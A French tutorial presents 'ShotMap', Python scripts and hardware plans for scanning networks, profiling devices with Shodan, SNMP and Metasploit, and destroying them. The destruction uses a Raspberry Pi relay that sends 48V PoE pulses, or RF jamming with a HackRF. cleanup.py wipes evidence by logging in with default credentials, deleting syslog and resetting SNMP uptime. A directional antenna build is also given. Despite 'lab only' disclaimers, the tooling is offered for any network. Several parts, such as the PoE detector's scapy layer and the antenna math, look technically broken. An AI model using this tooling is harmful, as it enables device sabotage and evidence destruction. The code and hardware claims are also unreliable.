Introduction
Salut, Sniper ! *One Shot, One Kill* est ton billet pour devenir un sniper cyber : avec *ShotMap*, tu vas scanner, cibler, et neutraliser des devices dans ton lab, comme un tir précis à 1000 mètres. Débutant ou pro, ce tuto est pour toi – mais lab only, Apache ! Toujours éthique, pour les hackers de tous horizons. 😈
Ce que tu vas apprendre :
- Le mindset sniper : patience, précision, discrétion.
- Scanner un réseau comme un fantôme avec *ShotMap*.
- Griller un quartz via PoE ou RF (et le réparer).
- Fabriquer une antenne directionnelle DIY.
- Protéger tes systèmes en comprenant l’attaque.
Étape 1 : Le Mindset Sniper
Un sniper cyber, c’est une ombre : il observe, attend, et frappe pile là où ça fait mal. Pas besoin d’être un pro pour capter :
- Patience : Étudie le réseau comme un terrain. Une IP, un port, c’est une piste.
- Précision : Vise le quartz, pas tout le device. Un exploit net, un kill propre.
- Discrétion : Spoofe, nettoie, disparais. T’es invisible.
- Éthique : On casse en lab pour protéger dehors. Le savoir unit tous les horizons.
Pense à un sniper : discipline, focus. À toi de viser juste.
Étape 2 : Le Lab de l’Ombre
Ton lab, c’est ton terrain de chasse : routeurs (Cisco, MikroTik), IoT (caméras, plugs), vieux matos, et même un sat simulé pour pimenter. Chaque device est une cible, chaque quartz un esprit à neutraliser. Débutant ? On te guide pas à pas :
Setup simple :
- Un PC avec Kali Linux (ou une VM).
- Un Raspberry Pi pour le *Quartz Killer*.
- Une station de soudage (pas cher sur Amazon).
- Optionnel : HackRF One pour RF.
Installation :
sudo apt update && sudo apt install -y python3 python3-pip nmap snmp metasploit-framework
pip3 install scapy pysnmp shodan RPi.GPIO pycryptodome hackrf
Lab only, Apache ! Ce tuto est pour ton terrain privé. Attaquer un device non autorisé, c’est illégal partout. Reste clean.
Étape 3 : ShotMap – L’arme du sniper
*ShotMap* est ton fusil : un outil Python CLI qui scanne, cible, tire, protège, et disparaît. Débutant ? Les scripts sont plug-and-play. Pro ? Tu vas kiffer la modularité et la furtivité. On a tout pensé pour que ça marche sur n’importe quel réseau, du lab au chaos mondial.
Guide de test complet
Voici comment tester *ShotMap* dans ton lab, étape par étape, pour que même un newbie puisse snipper comme un pro :
- Préparer le lab : Branche un routeur (ex. : Cisco RV340), une caméra IoT, ou un device simulé (ex. : sat via SDR). Note l’IP (ex. : 192.168.1.1). Assure-toi que Kali est à jour (
sudo apt update). - Installer ShotMap : Copie les scripts (*recon.py*, *target.py*, *fire.py*, *cleanup.py*, *defense.py*) dans un dossier (ex. :
~/shotmap). Installe les dépendances (voir ci-dessus). ChangeAPI_KEYdans *recon.py* etYourSuperSecretKeypour le chiffrement. - Reconnaissance : Lance
python3 recon.py --passivepour sniffer oupython3 recon.pypour un scan actif. Vérifietargets.json.enc. Décrypte si besoin (ajoute un script de déchiffrement si tu veux). - Ciblage : Choisis une IP (ex. : 192.168.1.1) et lance
python3 target.py 192.168.1.1. Vérifietarget_192.168.1.1.json.enc. Le script te dira si le quartz est vulnérable (ex. : PoE). - Tir : Branche le *Quartz Killer* (voir hardware). Lance
python3 fire.py 192.168.1.1 --method poepour PoE ou--method rf --freq 25MHzpour HackRF. Vérifie si le device est HS (ping négatif). - Défense : Lance
python3 defense.pysur une autre machine pour surveiller les pulses PoE. Configure un SMTP local si tu veux des alertes. - Nettoyage : Lance
python3 cleanup.py 192.168.1.1pour effacer les logs et timestamps SNMP. - Réparation : Remplace le quartz grillé (voir réparation). Relance le device et répète.
Polyvalence :
- Modularité : Les scripts appellent des outils Kali si besoin (ex. :
nmappour scans avancés,msfconsolepour exploits firmware viasubprocess.run(["msfconsole", "-q", "-x", "use exploit/..."])). - Gestion d’erreurs : Chaque script reste ouvert en cas de bug (try/except, logs détaillés). Exemple : si SNMP échoue, *target.py* passe en mode “unknown”.
- Adaptabilité : Fonctionne sur tout réseau (ton lab = réseau mondial). Change
NETWORKdans *recon.py* pour cibler (ex. : 10.0.0.0/8).
Conseils :
- Teste sur un routeur avec creds par défaut (admin/admin) pour *cleanup.py*.
- Pour RF, utilise un HackRF One en cage de Faraday pour éviter les interférences légales.
- Si un script plante, lis les erreurs dans la console. On a tout logué pour toi.
Module 1 : Reconnaissance (recon.py)
Comme un sniper dans la jungle, *recon.py* trouve les devices sans un bruit. Mode passif (sniff) ou actif (SYN furtif), il profile avec Shodan.
#!/usr/bin/env python3
import scapy.all as scapy
import json
import subprocess
from shodan import Shodan
# Configuration (change pour ton lab)
API_KEY = "YOUR_SHODAN_API_KEY" # Ta clé Shodan
NETWORK = "192.168.1.0/24" # Ton réseau
def run_nmap(ip):
try:
result = subprocess.run(["nmap", "-O", ip], capture_output=True, text=True)
return result.stdout
except:
return "Nmap échoué"
def shotmap_recon(network=NETWORK, passive=False):
print("[*] ShotMap Recon v1.0 - One Shot, One Kill")
targets = []
try:
if passive:
print("[*] Sniffing pendant 30s...")
packets = scapy.sniff(timeout=30)
for pkt in packets:
if pkt.haslayer(scapy.IP):
ip = pkt[scapy.IP].src
if ip not in [t["ip"] for t in targets]:
targets.append({"ip": ip, "model": "unknown", "quartz": "unknown"})
else:
print("[*] Scan actif furtif...")
ans, _ = scapy.sr(scapy.IP(dst=network)/scapy.TCP(dport=80, flags="S"), timeout=2, verbose=0)
for sent, recv in ans:
ip = recv[scapy.IP].src
targets.append({"ip": ip, "model": "unknown", "quartz": "unknown"})
# OSINT avec Shodan
api = Shodan(API_KEY)
for target in targets:
try:
result = api.host(target["ip"])
target["model"] = result.get("product", "unknown")
target["quartz"] = "estimated 25-50 MHz"
target["nmap"] = run_nmap(target["ip"])
except Exception as e:
print(f"[!] Erreur Shodan pour {target['ip']}: {e}")
target["nmap"] = run_nmap(target["ip"])
# Chiffrement des logs
from Crypto.Cipher import AES
key = "YourSuperSecretKey".encode() # Change ça !
cipher = AES.new(key, AES.MODE_EAX)
data = json.dumps(targets, indent=2).encode()
ciphertext, tag = cipher.encrypt_and_digest(data)
with open("targets.json.enc", "wb") as f:
f.write(cipher.nonce + tag + ciphertext)
print("[+] Logs chiffrés dans targets.json.enc")
except Exception as e:
print(f"[!] Erreur générale: {e}")
print("[*] Reste calme, vérifie ta config et relance.")
return targets
if __name__ == "__main__":
try:
targets = shotmap_recon()
for t in targets:
print(f"[+] Target: {t['ip']} | Model: {t['model']} | Quartz: {t['quartz']}")
if t.get("nmap"):
print(f"[+] Nmap: {t['nmap'][:100]}...")
except KeyboardInterrupt:
print("[*] Arrêt par l’utilisateur. T’es toujours un Apache !")
except Exception as e:
print(f"[!] Erreur: {e}")
print("[*] Console ouverte, débroussaille le bug !")
Module 2 : Ciblage (target.py)
*target.py* zoome sur un device, trouve son modèle via SNMP, et te dit comment le snipper.
#!/usr/bin/env python3
import json
from pysnmp.hlapi import *
import argparse
import subprocess
# Base de données (ajoute tes devices)
QUARTZ_DB = {
"Cisco RV340": {"quartz": "50 MHz", "type": "SMD", "vuln": "PoE spike"},
"MikroTik RB750": {"quartz": "25 MHz", "type": "SMD", "vuln": "PoE spike"}
}
def run_msf_probe(ip):
try:
result = subprocess.run(["msfconsole", "-q", "-x", f"use auxiliary/scanner/snmp/snmp_login; set RHOSTS {ip}; run; exit"], capture_output=True, text=True)
return result.stdout
except:
return "Metasploit échoué"
def get_snmp_info(ip, community="public"):
try:
iterator = getCmd(
SnmpEngine(),
CommunityData(community),
UdpTransportTarget((ip, 161)),
ContextData(),
ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))
)
errorIndication, errorStatus, errorIndex, varBinds = next(iterator)
if errorIndication or errorStatus:
return "unknown"
return str(varBinds[0][1])
except:
return "unknown"
def shotmap_target(ip):
print("[*] ShotMap Target v1.0 - One Shot, One Kill")
try:
print("[*] Profilage de", ip)
model = get_snmp_info(ip)
if "cisco" in model.lower():
model = "Cisco RV340"
elif "mikrotik" in model.lower():
model = "MikroTik RB750"
else:
model = "unknown"
target_info = QUARTZ_DB.get(model, {"quartz": "unknown", "type": "unknown", "vuln": "unknown"})
target_info["ip"] = ip
target_info["model"] = model
target_info["msf"] = run_msf_probe(ip)
# Chiffrement
from Crypto.Cipher import AES
key = "YourSuperSecretKey".encode()
cipher = AES.new(key, AES.MODE_EAX)
data = json.dumps(target_info, indent=2).encode()
ciphertext, tag = cipher.encrypt_and_digest(data)
with open(f"target_{ip}.json.enc", "wb") as f:
f.write(cipher.nonce + tag + ciphertext)
print("[+] Target chiffré dans target_{}.json.enc".format(ip))
return target_info
except Exception as e:
print(f"[!] Erreur: {e}")
print("[*] Reste en console, check SNMP et relance.")
return {"ip": ip, "model": "unknown", "vuln": "unknown"}
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ShotMap Target - One Shot, One Kill")
parser.add_argument("ip", help="IP du device")
args = parser.parse_args()
try:
target = shotmap_target(args.ip)
print(f"[+] Target: {target['ip']} | Model: {target['model']} | Quartz: {target['quartz']} | Vuln: {target['vuln']}")
if target.get("msf"):
print(f"[+] Metasploit: {target['msf'][:100]}...")
except KeyboardInterrupt:
print("[*] Arrêt par l’Apache. T’es toujours dans le game !")
Module 3 : Tir (fire.py)
*fire.py* grille le quartz via PoE ou RF. Robuste et clair pour tous.
#!/usr/bin/env python3
import RPi.GPIO as GPIO
import time
import json
import argparse
import random
# RF support (optionnel)
try:
from hackrf import HackRF
except ImportError:
HackRF = None
def load_target(ip):
try:
with open(f"target_{ip}.json.enc", "rb") as f:
data = f.read()
from Crypto.Cipher import AES
key = "YourSuperSecretKey".encode()
nonce, tag, ciphertext = data[:16], data[16:32], data[32:]
cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
plaintext = cipher.decrypt_and_verify(ciphertext, tag)
return json.loads(plaintext)
except Exception as e:
print(f"[!] Erreur chargement cible: {e}")
return {"ip": ip, "model": "unknown", "vuln": "unknown"}
def fire_poe(duration=0.5):
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(18, GPIO.OUT)
print("[*] Firing PoE pulse...")
GPIO.output(18, GPIO.HIGH)
time.sleep(duration)
GPIO.output(18, GPIO.LOW)
GPIO.cleanup()
except Exception as e:
print(f"[!] Erreur PoE: {e}")
print("[*] Vérifie ton Raspberry Pi et relance.")
def fire_rf(freq="25MHz", duration=0.5):
if not HackRF:
print("[!] HackRF non installé. Installez via 'pip3 install hackrf'.")
return False
try:
print("[*] Firing RF jam...")
with HackRF() as hrf:
hrf.transmit(lambda t: [random.randint(-128, 127) for _ in range(2048)], freq, sample_rate=20e6, tx_gain=40)
time.sleep(duration)
return True
except Exception as e:
print(f"[!] Erreur RF: {e}")
return False
def shotmap_fire(ip, method="poe", duration=0.5, freq="25MHz"):
print("[*] ShotMap Fire v1.0 - One Shot, One Kill")
try:
target = load_target(ip)
if target["vuln"] != "PoE spike" and method == "poe":
print(f"[!] {target['model']} non vulnérable à PoE")
return False
if method == "poe":
fire_poe(duration)
print(f"[+] Quartz neutralisé sur {ip} ({target['model']})")
return True
elif method == "rf":
success = fire_rf(freq, duration)
if success:
print(f"[+] Quartz brouillé sur {ip} ({target['model']})")
return success
else:
print("[!] Méthode non supportée")
return False
except Exception as e:
print(f"[!] Erreur: {e}")
print("[*] Console ouverte, check ton matos et relance.")
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ShotMap Fire - One Shot, One Kill")
parser.add_argument("ip", help="IP du device")
parser.add_argument("--method", default="poe", choices=["poe", "rf"], help="Méthode d'attaque")
parser.add_argument("--duration", type=float, default=0.5, help="Durée du pulse (s)")
parser.add_argument("--freq", default="25MHz", help="Fréquence RF")
args = parser.parse_args()
try:
shotmap_fire(args.ip, args.method, args.duration, args.freq)
except KeyboardInterrupt:
print("[*] Arrêt par l’Apache. Reviens snipper !")
Module 4 : Nettoyage (cleanup.py)
*cleanup.py* efface tes traces, y compris les timestamps SNMP.
#!/usr/bin/env python3
import paramiko
import argparse
from pysnmp.hlapi import *
def clean_logs(ip, username="admin", password="admin"):
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, username=username, password=password)
ssh.exec_command("rm -f /var/log/syslog")
ssh.close()
print(f"[+] Logs nettoyés sur {ip}")
return True
except Exception as e:
print(f"[!] Échec SSH: {e}")
return False
def clean_snmp_timestamps(ip, community="public"):
try:
iterator = setCmd(
SnmpEngine(),
CommunityData(community),
UdpTransportTarget((ip, 161)),
ContextData(),
ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysUpTime', 0), TimeTicks(0))
)
errorIndication, errorStatus, errorIndex, varBinds = next(iterator)
if errorIndication or errorStatus:
print(f"[!] Échec SNMP: {errorIndication or errorStatus}")
return False
print(f"[+] Timestamps SNMP réinitialisés sur {ip}")
return True
except Exception as e:
print(f"[!] Erreur SNMP: {e}")
return False
def shotmap_cleanup(ip):
print("[*] ShotMap Cleanup v1.0 - One Shot, One Kill")
try:
clean_logs(ip)
clean_snmp_timestamps(ip)
print(f"[+] Cleanup terminé pour {ip}")
except Exception as e:
print(f"[!] Erreur: {e}")
print("[*] Console ouverte, check tes creds et relance.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ShotMap Cleanup - One Shot, One Kill")
parser.add_argument("ip", help="IP du device")
args = parser.parse_args()
try:
shotmap_cleanup(args.ip)
except KeyboardInterrupt:
print("[*] Arrêt par l’Apache. T’es clean !")
Module 5 : Défense (defense.py)
*defense.py* surveille les pulses PoE pour protéger ton lab.
#!/usr/bin/env python3
from scapy.all import *
import smtplib
from email.message import EmailMessage
def alert_admin(message):
try:
msg = EmailMessage()
msg.set_content(message)
msg["Subject"] = "Alerte ShotMap Défense"
msg["From"] = "shotmap@lab.local"
msg["To"] = "admin@lab.local"
with smtplib.SMTP("localhost", 25) as s:
s.send_message(msg)
print("[+] Alerte envoyée")
except Exception as e:
print(f"[!] Échec alerte: {e}")
def detect_poe_attack(interface="eth0"):
print("[*] Surveillance PoE sur", interface)
try:
cap = sniff(iface=interface, filter="ether proto 0x8808", count=10)
for pkt in cap:
if pkt.haslayer("PowerEthernet") and pkt[PowerEthernet].voltage > 50:
alert_admin(f"Attaque PoE détectée sur {interface} ! Voltage: {pkt[PowerEthernet].voltage}V")
print("[!] Surtension détectée")
return True
print("[+] Rien de suspect")
return False
except Exception as e:
print(f"[!] Erreur: {e}")
return False
def shotmap_defense(interface="eth0"):
print("[*] ShotMap Defense v1.0 - One Shot, One Kill")
try:
detect_poe_attack(interface)
except Exception as e:
print(f"[!] Erreur: {e}")
print("[*] Console ouverte, vérifie ton interface.")
if __name__ == "__main__":
try:
shotmap_defense()
except KeyboardInterrupt:
print("[*] Arrêt par l’Apache. Ton lab est safe !")
Explications pour tous :
- recon.py : Ton radar. Trouve les devices sans te faire capter.
- target.py : Ta lunette. Analyse pour viser le quartz.
- fire.py : Ton flingue. Tire un pulse PoE ou RF.
- cleanup.py : Ton balai. Efface tes traces.
- defense.py : Ton bouclier. Surveille les snipers ennemis.
Utilisation : Lance python3 nom_du_script.py dans un terminal. Change l’IP et la clé Shodan dans *recon.py*. RF ? Installe *hackrf*. Ça plante ? Lis les logs, on reste en console.
Étape 4 : Quartz Killer – Le tir parfait
Le *Quartz Killer* est ton arme physique : un adaptateur PoE ou un HackRF One. Voici le schéma ASCII pour le PoE :
+-----------------+
| Raspberry Pi |
| |
| GND [ ] |
| 3.3V [ ] |
| GPIO18[•]------+-----[Wire]-----+
| | |
+-----------------+ |
|
+-----------------+ |
| Relais 5V | |
| | |
| IN [•]-------|----------------+
| COM [•]---+---+---[Wire]---[ +48V PoE Injecteur ]
| NO [•]---|--------------------[ RJ45 to Device ]
| NC [ ] | |
| +---[Wire]---[ GND PoE Injecteur ]
| |
+-----------------+
Explications :
- Composants : Raspberry Pi, relais 5V (SRD-05VDC-SL-C), injecteur PoE (48V), connecteur RJ45, fils.
- Connexions :
- GPIO18 (Pi) → IN (relais) : contrôle le pulse.
- COM (relais) → +48V (PoE) : alimentation.
- NO (relais) → RJ45 (device) : envoie le pulse.
- GND (Pi) → GND (PoE) : masse commune.
- Montage : Soude ou utilise une breadboard. Vérifie avec un multimètre (48V sur NO quand IN est HIGH).
- Test : Lance
python3 fire.py 192.168.1.1 --method poe. Le device doit s’éteindre (quartz HS). - Coût : ~50€ (Pi 30€, relais 5€, PoE 15€).
RF (avancé) : Brouille le quartz avec un HackRF One (25 MHz). Installe :
pip3 install hackrf
Explications :
- PoE : Pulse électrique précis. Plug-and-play.
- RF : Brouillage sans contact. Ultra-réglementé, lab only !
Étape 5 : Optimisation – Antenne directionnelle DIY
Booste ton HackRF avec une antenne faite maison. Matériel : cintre, connecteur SMA, fil de cuivre, planche.
Matériel :
- Cintre métallique (élément rayonnant).
- Connecteur SMA femelle (pour HackRF).
- Fil de cuivre (2 mm, dipôle).
- Planche de bois (30x30 cm, support).
- Soudure, fer à souder, cutter.
Étapes :
- Calcul : Pour 25 MHz, longueur d’onde = 12 m (c = 3e8 m/s, λ = c/f). Dipôle demi-onde = 6 m. Réduit à 30 cm pour le lab.
- Dipôle : Coupe le cintre en deux segments de 15 cm. Soude un à la broche SMA, l’autre à la masse.
- Réflecteur : Fil de cuivre (16 cm) à 7 cm derrière, fixé sur la planche.
- Fixation : Colle ou visse. Branche au HackRF.
- Test : Vise un device à 1 m, lance
python3 fire.py --method rf. Ajuste l’angle.
Conseils :
- Multimètre pour vérifier les soudures.
- Lab only : RF réglementé.
- Coût : ~10€ (SMA ~5€).
Attention ! Émissions RF = lois strictes. Lab only, sur ton matos.
Étape 6 : PCB Prêt-à-Souder
Fabrique un *Quartz Killer* pro avec un PCB. Schéma ASCII ci-dessus (section hardware).
Explications :
- Composants : Relais 5V, RJ45, bornier PoE.
- Soudure : GPIO18 → IN, COM → +48V, NO → Ethernet.
- Logiciel : KiCad pour PCB, Gerber pour fabrication (JLCPCB, ~10€).
- Débutants : Breadboard OK.
Étape 7 : Réparation – Le cycle éthique
Griller, c’est cool, réparer, c’est pro. Pas besoin d’être un as :
- Étape 1 : Trouve le quartz (25 MHz, carré brillant).
- Étape 2 : Dessoude (fer ou air chaud).
- Étape 3 : Remplace (Mouser, ~1€).
- Étape 4 : Teste (multimètre ou oscilloscope).
#!/usr/bin/env python3
quartz_db = {
"Cisco RV340": {"freq": "50 MHz", "type": "SMD"},
"MikroTik RB750": {"freq": "25 MHz", "type": "SMD"}
}
def suggest_repair(ip, model):
try:
quartz = quartz_db.get(model, {"freq": "unknown", "type": "unknown"})
print(f"[*] Quartz pour {model}: {quartz['freq']}, {quartz['type']}")
print("[+] Commander sur Mouser or DigiKey")
except Exception as e:
print(f"[!] Erreur: {e}")
if __name__ == "__main__":
try:
suggest_repair("192.168.1.1", "Cisco RV340")
except KeyboardInterrupt:
print("[*] Arrêt par l’Apache. À la prochaine !")
Étape 8 : FAQ Légale
Questions ? Réponses nettes :
- Routeur perso ? Oui, si t’es proprio. Sinon, illégal.
- Wi-Fi du voisin ? Non, délit. Lab only.
- Contrat obligatoire ? Oui, pour le code.
- Partager le tuto ? Oui, mais insiste sur le lab.
Doute ? Parle à un avocat ou une autorité cyber.
Étape 9 : Éthique – Snipers, pas criminels
“ShotMap n’est pas un outil, c’est une philosophie : frapper peu, frapper juste, et protéger toujours.” On casse en lab pour protéger dehors. Déclare tes failles (ex. : CVE), partage le savoir, sois un Apache droit. Le savoir est notre arme, l’éthique notre bouclier.
Pas de conneries, Apache ! Hors lab, c’est la taule. Reste dans ton terrain.